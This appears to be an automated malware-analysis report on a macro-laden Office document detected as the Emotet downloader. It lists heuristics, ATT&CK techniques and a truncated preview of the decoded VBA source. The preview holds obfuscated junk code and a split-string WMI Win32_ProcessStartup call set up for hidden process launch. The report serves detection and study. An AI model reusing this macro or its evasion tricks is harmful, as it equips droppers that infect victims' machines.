Verdict: MALICIOUS
Risk Score: 342

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of legacy auto-exec macros and obfuscated API calls to launch processes via WMI. ClamAV specifically identifies it as Emotet, a known downloader family. The VBA script uses obfuscation techniques and calls to Win32_Process, strongly suggesting its purpose is to download and execute a secondary payload.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-6861630-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6861630-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 69b7c72fb070ed530636023be36a21512bf33c9f9455a6424a839764d669d447) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54027 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "c76189"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "O98_63"
Function O879479_()
If M42269 <> Q28408 Then
O_6048 = (73301558)
k913__0 = b025_53_ * 721660429 + w3_4__ + CLng(E_0379)
l_55_5_1 = 149289953 / Hex(z175__68 / Chr(q4167___ - CDate(513507093)) * 616259750 / 740247798) / Y26_604 - Fix(756812418)
z6390_52 = (15128212)
End If
If R4_232 <> v7_77_6 Then
j285_47_ = (654623649)
l69_362 = w2_6_9 * 295143666 + I01838_8 + CLng(C74789_)
B5108__8 = 188324159 / Hex(J___7_ / Chr(J22089 - CDate(756687052)) * 592738394 / 679060146) / q416802 - Fix(9226827)
K106862 = (510169079)
End If
If W45__34_ <> F7_601 Then
J5863201 = (379361940)
k003_38 = j0__871 * 960521750 + r3856541 + CLng(C__26_)
P232753 = 504942687 / Hex(p01__75 / Chr(S4_728 - CDate(332299222)) * 330627682 / 893290600) / X029030_ - Fix(665928665)
u_9453 = (329849628)
End If
If j__55395 <> U__3533 Then
a934_17 = (64449259)
I677259 = k5524_9_ * 713748853 + h826047 + CLng(Q_26_0)
Q__08471 = 205903434 / Hex(a24___09 / Chr(n___90 - CDate(913914017)) * 199311882 / 875112563) / c06_7_2 - Fix(329457708)
Z_84_11 = (371697055)
End If
If z160877 <> K14_86 Then
r4_1632_ = (516277596)
w2_2_6_ = u18418 * 173275792 + F92_94__ + CLng(s4__5__)
w57003 = 38043446 / Hex(Z___4267 / Chr(Z031_4 - CDate(839160335)) * 17092399 / 170062673) / S37__8 - Fix(649743509)
j984699 = (870323211)
End If
If k49_6_0 <> K3612367 Then
Q_4_2_ = (70684428)
C__5__ = b___98__ * 596373992 + P29_5_4 + CLng(V715_7_)
t74_6_0 = 417679645 / Hex(S6185_82 / Chr(T892_61_ - CDate(442593422)) * 996095986 / 127649435) / R_226__4 - Fix(932451939)
P26__96 = (372098297)
End If
If L6___9_ <> w_637_4 Then
t_4630 = (278273830)
V067_6_ = G589_5_8 * 293241615 + v9_506 + CLng(r428_2)
C84130_ = 124231430 / Hex(O4_996_ / Chr(r_1_5_0 - CDate(994034080)) * 653997374 / 36807244) / a500117_ - Fix(255849435)
J3256300 = (763188849)
End If
If T02300 <> O_6__243 Then
A0__72 = (149492458)
H8_185 = Q92793_ * 121629061 + i95_2_3 + CLng(X9311_82)
l_7_0_8 = 246872323 / Hex(b108974 / Chr(V3_256 - CDate(833198370)) * 119662599 / 616748986) / E26_393 - Fix(680288797)
c87177_0 = (396862687)
End If
End Function
Function d2633285(T9_70_39, R_33__)
On Error Resume Next
If Q623_930 <> K235_0_7 Then
X__7328 = (698332333)
G__56423 = m87__6 * 478782407 + c6987669 + CLng(o271__54)
Y8_15__6 = 10263698 / Hex(h2_27856 / Chr(i7392579 - CDate(998252436)) * 620537820 / 123553093) / T_98487 - Fix(980928270)
I2_9_6 = (247364945)
End If
If z6___0_2 <> c44734_3 Then
G_6_7285 = (815257627)
l8_568_3 = u13051 * 10446657 + M98401 + CLng(M02056)
l62_011_ = 895684693 / Hex(M33185_5 / Chr(P34669 - CDate(454831298)) * 101905487 / 426315216) / E_99_46 - Fix(204546263)
R72__299 = (345344497)
End If
If Y7_0___ <> d0136_0 Then
S712_41 = (721534745)
i__00_0 = K1_427 * 244624806 + X2443_9 + CLng(T8804_)
f0_560_ = 501663031 / Hex(a3_901 / Chr(t65912 - CDate(726701727)) * 464592926 / 317865879) / a__29_8 - Fix(239701313)
W4_382 = (753815034)
End If
Set j_3_464_ = GetObject(d5_1_3_0 + "winmgm" + z68_779 + "ts:Win" + "32_Proce" + "ssStartup")
If H65_058 <> Y_4_24 Then
V07134_1 = (528280549)
w2486_94 = s_55_628 * 239136823 + C268_5_ + CLng(k3__5_3)
K8_5_8_2 = 728193341 / Hex(l7513_1_ / Chr(X02_301 - CDate(546982219)) * 15227945 / 908761120) / i118_3__ - Fix(813369194)
Q_4__96 = (908373056)
End If
If n27_1892 <> d9__1_72 Then
w123847 = (39436152)
k46568_7 = f_9_4_9 * 929263402 + d1_71__ + CLng(n29_815)
X7213__ = 136031590 / Hex(z09821 / Chr(X_50982 - CDate(175626204)) * 234876415 / 27506706) / r_9_77 - Fix(263119365)
r0_5_502 = (604377794)
End If
j_3_464_.ShowWindow = 126014 - 126014
If d467_
... (truncated)